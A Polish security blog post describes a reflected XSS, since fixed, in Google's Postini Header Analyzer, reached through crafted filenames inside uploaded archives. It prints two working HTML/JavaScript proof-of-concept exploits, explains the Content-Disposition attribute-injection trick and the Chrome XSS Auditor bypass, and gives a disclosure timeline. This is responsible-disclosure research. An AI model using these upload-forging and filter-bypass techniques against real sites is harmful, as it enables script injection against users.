[nowość] Poznaj bezpieczeństwo Windows. Cześć pierwsza: usługi systemowe. Nowe, bezpłatne szkolenie od sekuraka!

XSS w domenie www.google.com (Postini Header Analyzer)

06 lutego 2015, 08:10 | Teksty | komentarzy 11
W tym artykule pokażę błąd typu reflected XSS w domenie www.google.com, w aplikacji Postini Header Analyzer. Przedstawię po kolei przeszkody, które musiałem pokonywać, by napisać działającego exploita, nie wymagającego interakcji użytkownika.

Zachęcony ostatnim prezentem od Google, postanowiłem znów poszukać jakichś podatności na ichnich stronach www, skupiając się tym razem wyłącznie na domenie www.google.com. Przemierzając różne raczej nieznane i zapomniane strony, natrafiłem na Postini Header Analyzer. Postini jest firmą przejętą przez Google w 2007 roku, świadczącą usługi chmurowe służące do filtrowania złośliwych i spamowych maili. Wiadomości, które przeszły przez filtr Postini miały dodawane nagłówki, których nazwy zaczynały się od „x-pstn-„. Ponieważ interpretacja tych nagłówków nie była trywialna dla przeciętnych użytkowników, w 2009 roku uruchomiono wspomniany Header Analyzer, gdzie można było przesłać nagłówki z e-maila, w odpowiedzi otrzymując tabelkę z wyjaśnionym znaczeniem poszczególnych wpisów.

Upload pliku

Rys 1. Wygląd aplikacji Postini Header Analyzer

Rys 1. Wygląd aplikacji Postini Header Analyzer

Aplikacja składa się z jednego formularza (Rys 1.), w którym można wkleić nagłówki z maila do pola tekstowego albo wgrać je w postaci pliku msg, txt, zip, tar, gz, mbox lub eml. W szczególności zainteresowały mnie pliki skompresowane. Przygotowałem więc prosty plik zip, składający się z dwóch plików (o nazwach plik1.txt i plik2.test) i sprawdziłem jak aplikacja się zachowa po uploadzie.

Rys 2. Wynik uploadu pliku .zip

Rys 2. Wynik uploadu pliku .zip

Jak widzimy na obrazku (Rys 2.), na wyjściu strony wyświetlane są nazwy plików znajdujących się w zipie oraz zawartość – w przypadku pliku o odpowiednim rozszerzeniu. Oczywiście twórcy aplikacji pomyśleli o tym, że ktoś może próbować robić XSS przez zawartość pliku i była ona odpowiednio enkodowana. Co w takim razie z nazwami plików?

Utworzyłem więc zip, w którym nazwa jednego z plików była kodem HTML (Rys 3.) i spróbowałem go uploadować… (Rys 4.)

Rys 3. Plik zip z XSS-ową nazwą pliku

Rys 3. Plik zip z XSS-ową nazwą pliku

Rys 4. Alert wyświetlony po uploadzie

Rys 4. Alert wyświetlony po uploadzie

Świetnie! Wiedziałem już, że strona jest podatna na XSS, ale droga do praktycznego wykorzystania podatności była jeszcze długa i kręta. Jeśli mamy formularz, w którym znajduje się pole z wyborem pliku, użytkownik zawsze musi samemu ten plik wybrać z dysku. Nie ma możliwości, by wypełnić je swoimi danymi. Mielibyśmy więc taki scenariusz ataku:

 1. Użytkownik pobiera złośliwie przygotowany plik .zip,
 2. Użytkownik przechodzi na spreparowaną przez atakującego stronę,
 3. Użytkownik w oknie dialogowym wybiera plik zip, który wcześniej ściągnął.
 4. Użytkownik wysyła formularz.

Co prawda nie wątpię, że istnieją użytkownicy, którzy daliby się wmanewrować w taki atak, ale w ich przypadku pewnie można by umieścić w tym zipie wirusa i tak samo chętnie by go uruchomili ;). Obawiałem się, że Google uzna taki scenariusz ataku za zbyt mało rzeczywisty, toteż zacząłem się zastanawiać, co mogę zrobić aby go uprawdopodobnić.

Oczywistym było, że muszę pozbyć się okna dialogowego z wyborem pliku. Muszę wysłać zwykły formularz, w taki sposób, aby z punktu widzenia serwera wyglądało to jak formularz uploadu. Okazało się, że jak najbardziej było to możliwe.

Content-disposition

Rys 5. Fragment zapytania http z uploadem pliku

Rys 5. Fragment zapytania http z uploadem pliku

Spójrzmy na rysunku 5. jak wygląda fragment zapytania http, w którym wykonuje się upload pliku. Mamy nagłówek Content-Disposition, który składa się z atrybutow name oraz filename. Proponuję chwilę na ten nagłówek spojrzeć i zastanowić się (intuicyjnie) w jaki sposób serwer powinien parsować jego zawartość. Przypuszczam, że wszyscy spodziewamy się, że skoro wartości atrybutów name filename umieszczono w cudzysłowach, to niezależnie od tego jakie znaki znajdą się w środku, zostaną one zinterpretowane jako wartości tychże atrybutów.

Okazało się jednak, że serwer zachowuje się inaczej. Dla serwera znak średnika był bezwzględnym separatorem atrybutów i nawet jeśli znalazł się w środku cudzysłowów, to i tak kończył od razu interpretację danej wartości. Na przykład, załóżmy, że mamy nagłówek: Content-Disposition: form-data; name=”test ; name=file_1; filename=test.zip; x” . Wbrew intuicji, cała zawartość między cudzysłowami nie zostanie potraktowana jako wartość atrybutu name, ale:

 • atrybut name o wartości „test
 • atrybut name o wartości file_1
 • atrybut filename o wartości test.zip

Jak widać, mamy dwa atrybuty o tej samej nazwie – dla serwera liczy się tylko ostatnia wartość.

Dzięki powyższej sztuczce, mogę utworzyć w formularzu HTML zwykłe pole input, które z punktu widzenia serwera będzie wyglądało jak pole zawierające plik. Cały exploit wyglądał następująco:

<html>
<body>
  <form action="http://www.google.com/postini/headeranalyzer/" method="POST" enctype="multipart/form-data">
   <input type="hidden" name="x; name=file_1; filename=XSS.zip; " id="vulnerable" value="" />
   <input type="submit" value="XSS @ google.com" />
  </form>
	<script>
	var zipfile = 'PK\x03\x04\n\x00\x00\x00\x00\x00\x90\xa0EF\xb3<\xaf\xb6\x06\x00\x00\x00\x06\x00\x00\x00\x15\x00\x1c\x00<svg onload=alert(1)>UT\t\x00\x03\xbf\xbe\xd3T\xbf\xbe\xd3Tux\x0b\x00\x01\x04\xf5\x01\x00\x00\x04\x14\x00\x00\x00Test.\nPK\x01\x02\x1e\x03\n\x00\x00\x00\x00\x00\x90\xa0EF\xb3<\xaf\xb6\x06\x00\x00\x00\x06\x00\x00\x00\x15\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\x00\x00\x00\x00<svg onload=alert(1)>UT\x05\x00\x03\xbf\xbe\xd3Tux\x0b\x00\x01\x04\xf5\x01\x00\x00\x04\x14\x00\x00\x00PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00[\x00\x00\x00U\x00\x00\x00\x00\x00';
	
	var vuln = document.getElementById('vulnerable');
	vuln.value = (zipfile);
	</script>
</body>
</html>

W linii 4 powyższego kodu znajduje się praktyczne zastosowanie sztuczki, którą opisałem powyżej. Później, z poziomu JavaScriptu, przypisuję do tego pola odpowiednią wartość. Otworzyłem więc powyższy kod w przeglądarce i byłem ciekaw, co się stanie po wysłaniu formularza…

Przygotowanie odpowiedniego archiwum

W odpowiedzi jednak… nie stało się nic; XSS nie wykonał się. Zajrzałem do treści żądania http w proxy (Rys 6.) po czym powód niepowodzenia stał się jasny.

Rys 6. Ucięty plik zip

Rys 6. Ucięty plik zip

Okazało się, że w zapytaniach typu multipart/form-data Firefox ucina wartości parametrów na bajcie zerowym. Mój zip zawierał bajt zerowy już na piątym znaku, więc ucięło prawie całą jego zawartość.

Spróbowałem więc w Chrome (Rys 7.). W nim również XSS się nie wykonał, ale zapytanie wyglądało zupełnie inaczej.

Rys 7. Zmodyfikowany zip przez Chrome

Rys 7. Zmodyfikowany zip przez Chrome

Tym razem bajty zerowe przechodziły, ale, jak widać, niektóre bajty zostały zamienione na encje HTML (np. &#175;). Wynika to z faktu, że dla przeglądarki dane wysyłane w formularzu POST, które nie są plikiem, są interpretowane w kodowaniu strony (w moim przypadku UTF-8). Jeśli którychś bajtów nie da się w danym kodowaniu poprawnie zinterpretować, zamiast nich wysyłane są encje. Dalsze testy wykazały, że Chrome przesyła normalnie (tj. bez jakiejkolwiek podmiany) wszystkie bajty z zakresu kodów ASCII 0-159 (0x9F). Musiałem więc wymyślić sposób, aby przygotować archiwum niezawierające żadnych zabronionych znaków.

Po pierwszych bojach doszedłem do wniosku, że przygotowanie zipa spełniającego ww. warunek będzie trudne, spojrzałem więc na inny format archiwów: tar, który jest też obsługiwany przez aplikację. Był to strzał w dziesiątkę, bowiem pliki tar zawierają właściwie tylko bajty zerowe i znaki alfanumeryczne (Rys 8.). Nie było więc żadnego znaku spoza dozwolonego zakresu i mogłem liczyć, że XSS powinien wreszcie się wykonać.

Rys 8. Hexdump przykładowego pliku tar

Rys 8. Hexdump przykładowego pliku tar

Zmodyfikowałem wcześniejszy formularz w taki sposób, by umieścić w nim plik tar i wysłałem. Niestety, pomimo że plik przesłał się w całości poprawnie, XSS wciąż się nie wykonał… (Rys 9.). Tym razem moim wrogiem był filtr XSS-owy z Chrome’a.

Rys 9. XSS Auditor w akcji!

Rys 9. XSS Auditor w akcji!

Filtr zadziałał, ponieważ wykrył, że kod javascriptowy, który miał zostać wykonany na stronie, został wysłany w treści zapytania http.

Pozostała mi zatem do przeskoczenia ostatnia przeszkoda: ominięcie XSS Auditora z Chrome’a.

Co zabawne, po zgłoszeniu błędu, dostałem informację od Google, że wcale nie musiałem prezentować kodu, który obchodzi filtr anty-XSS-owy bo i tak dostałbym nagrodę. Ale bez tego nie byłoby tyle zabawy ;)

Próbowałem już z zipem, próbowałem z tarem… ale aplikacja obsługuje jeszcze jeden typ archiwów: gzip. Gzipy najczęściej łączone są z tarem (format .tar.gz lub .tgz), może więc one będą rozwiązaniem mojego problemy?

W przeciwieństwie do zipów i tarów, gzipy są zazwyczaj używane wyłącznie do kompresji pojedynczych plików (dlatego wpierw używa się tarów, aby wiele plików złączyć w jeden plik). Format gzip składa się z następujących elementów (za wikipedią):

 • 10-bajtowy nagłówek, zawierający magic number (1f 8b), numer wersji i znacznik czasowy (te dwa ostatnie elementy nie były w rzeczywistości po stronie serwera sprawdzane),
 • Opcjonalnie dodatkowe nagłówki, np. z nazwą oryginalnego pliku (przed tym się wzbraniałem),
 • Strumień bajtów skompresowany algorytmem deflate,
 • Suma kontrolna CRC32,
 • Rozmiar oryginalnego pliku zapisany jako uint32.

Mając na uwadze wspomniane przeze mnie wcześniej obostrzenie, że plik wyjściowy może zawierać wyłącznie bajty z zakresu 0x00-0x9F, zacząłem zastanawiać się, gdzie grozi mi ryzyko, że takie bajty mogą się pojawić. Przede wszystkim mogłyby wystąpić w skompresowanym strumieniu bajtów. Tym jednak nie bardzo się przejąłem, bo skojarzyłem, że w zeszłym roku głośno było o podatności Rosetta Flash, której jednym z elementów składowych była kompresja algorytmem deflate tak, aby na wyjściu otrzymać wyłącznie znaki alfanumeryczne. Ten cel realizuje biblioteka ascii-zip.

Drugim ryzykownym polem była suma kontrolna CRC32. Pomyślałem, że może jednak będę miał szczęście – i jak przygotuję plik gzip to wstrzelę się z odpowiednią sumą kontrolną. Rzeczywistość oczywiście okazała się dla mnie mniej łaskawa: w odpowiedzi pojawił się jeden bajt o wartości spoza dozwolonego zakresu (Rys 10).

Rys 10. "Pechowy" bajt

Rys 10. „Pechowy” bajt

Na szczęście pliki tar mają strukturę całkiem przyjazną do modyfikacji – można na końcu dopisywać dowolną liczbę bajtów zerowych i nie zmieni to nic przy ich dekompresji. Napisałem więc prosty skrypt, który dopisywał po jednym bajcie do tara i sprawdzał czy poszczególne bajty sumy crc32 należą do oczekiwanego zakresu. Warunek został spełniony dość szybko, bowiem wystarczyło na końcu tara dopisać dwa null-bajty. To wszystko wygenerowało mi ostateczny kod exploita XSS-owego:

<html>
<body>
  <form action="http://www.google.com/postini/headeranalyzer/" method="POST" enctype="multipart/form-data">
   <input type="hidden" name="x; name=file_1; filename=abc.tar.gz; " id="vulnerable" value="" />
   <input type="submit" value="XSS @ google.com" />
  </form>
	<script>
	var tarfile = "\x1f\x8b\x08AAAAAAAD0Up0IZUnnnnnnnnnnnnnnnnnnnUU5nnnnnn3SUUnUUUwCiudIbEAt33wWDtDDDtGDtswDDwG0stpDDtGwwDDwwD33333sw033333gFPqImO\x7f[AWg{Wcs]c{KwoaYQ}HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHiiiueeAHiiiMuUAHiiiiyeAHiiiiiiiiiiuAYyeuYYeMEUuAiYeeuYHAiHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH_OocwHiiGSHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHOockkHHHHHHHHHHHHHHHHHHHHHHHHHHHiiiiiiAHiiiiiiAHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHCKOoq\\HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH\x08df\x0e\x1a\x0b\x08\x00\x00";
	
	var vuln = document.getElementById('vulnerable');
	vuln.value = (tarfile);
	</script>
</body>
</html>

Poniżej filmowy dowód, że kod działał:

Mój przykład exploita wymagał naciśnięcia przycisku, ale nic nie stoi na przeszkodzie, by w rzeczywistym przypadku atak odbywał się w pełni automatycznie i w sposób niewidoczny dla ofiary.

Kalendarz:

 • 2015-01-24 – zgłoszenie błędu do Google,
 • 2015-01-26 – informacja od Google, że zgłoszenie jest w kolejce,
 • 2015-01-29 – potwierdzenie od członka Google Security Teamu, że potrafi powtórzyć błąd,
 • 2015-02-04 – potwierdzenie, że błąd został naprawiony,
 • 2015-02-06 – publikacja na Sekuraku.

Podsumowanie

Opisany przeze mnie błąd XSS w Google’u jest ciekawym przykładem na to, ile przeszkód trzeba czasami pokonać, aby utworzyć działający exploit, nie wymagający interakcji. Reasumując, musiałem rozwiązać następujące problemy:

 • Jak wysłać plik przez http, by użytkownik nie musiał korzystać z okna dialogowego wyboru pliku,
 • W jaki sposób utworzyć archiwum niezawierające pewnych „zabronionych” bajtów,
 • Jak ominąć filtr chroniący przed atakami XSS w Chrome.

Kwestią otwartą pozostaje dla mnie, czy dało się wykorzystać błąd na przeglądarkach innych niż Chrome. Prawdopodobnie byłoby to możliwe za pomocą plików .tar.gz w Firefoksie, ale plik kompresowany musiałby mieć rozmiar większy niż 16843009 bajtów (0x01010101 heksadecymalnie – aby nie było żadnego null-bajtu). Myślę, że kiedyś jeszcze wrócę do tego i sprawdzę czy da się w rozsądnym czasie takie archiwum wygenerować.

–Michał Bentkowski, prowadzi bloga, pentester w Securitum.

Spodobał Ci się wpis? Podziel się nim ze znajomymi:Komentarze

 1. Bartek

  Na pierwszym listingu exploita są złe zmienne. Najpierw deklarujesz zifile a potem używasz tarfile.
  Poza tym jak zawsze bardzo ciekawie.

  Odpowiedz
 2. Michał

  Jaka to trzeba mieć nieszablonowa umiejetność myślenia zeby to wpasc. Gratulacje

  Odpowiedz
 3. Damian Wąsik

  „Użytkownik wysyła formularz formularz.”

  Super ciekawy i świetnie napisany artykuł. Dzięki!

  Odpowiedz
 4. imie

  z ciekawosci na ile taki bład wyceniają, usługa może nie popularna ale w domenie google.com więć bład niebezpieczny

  Odpowiedz
  • Błąd wystąpił w domenie http://www.google.com, którą jako całość zaliczają do „Other highly sensitive applications” (tak przynajmniej wynika z moich doświadczeń). Wycenili na $5k.

   Odpowiedz
 5. czesław

  Świetny artykuł. Zazdroszczę wiedzy.

  Odpowiedz
 6. waldemar

  zglaszam sprawe do urzedu skarbowego

  Odpowiedz
 7. sdgfsdf

  przyjemnie się czyta, więcej takich tekstów

  Odpowiedz
 8. Walter White

  Super artykuł. Czytałem do samego końca z zaciekawieniem.
  Michał Bentkowski – łap i opisuję więcej takich błędów :) Powodzenia

  Odpowiedz

Odpowiedz